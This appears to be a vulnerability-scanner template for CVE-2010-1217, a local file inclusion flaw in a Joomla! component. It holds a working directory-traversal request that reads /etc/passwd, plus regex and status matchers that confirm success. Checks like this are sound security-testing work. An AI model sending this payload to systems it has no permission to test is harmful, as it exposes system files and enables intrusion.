27 lines
991 B
YAML
27 lines
991 B
YAML
|
id: CVE-2010-1217
|
||
|
|
|
||
|
|
info:
|
||
|
|
name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion
|
||
|
|
author: daffainfo
|
||
|
|
severity: high
|
||
|
description: Directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
|
||
|
|
reference:
|
||
|
|
- https://www.exploit-db.com/exploits/11814
|
||
|
|
- https://www.cvedetails.com/cve/CVE-2010-1217
|
||
|
|
tags: cve,cve2010,joomla,lfi
|
||
|
|
|
||
|
|
requests:
|
||
|
|
- method: GET
|
||
|
|
path:
|
||
|
|
- "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"
|
||
|
|
|
||
|
|
matchers-condition: and
|
||
|
|
matchers:
|
||
|
|
|
||
|
|
- type: regex
|
||
|
|
regex:
|
||
|
|
- "root:.*:0:0"
|
||
|
|
|
||
|
|
- type: status
|
||
|
|
status:
|
||
|
|
- 200
|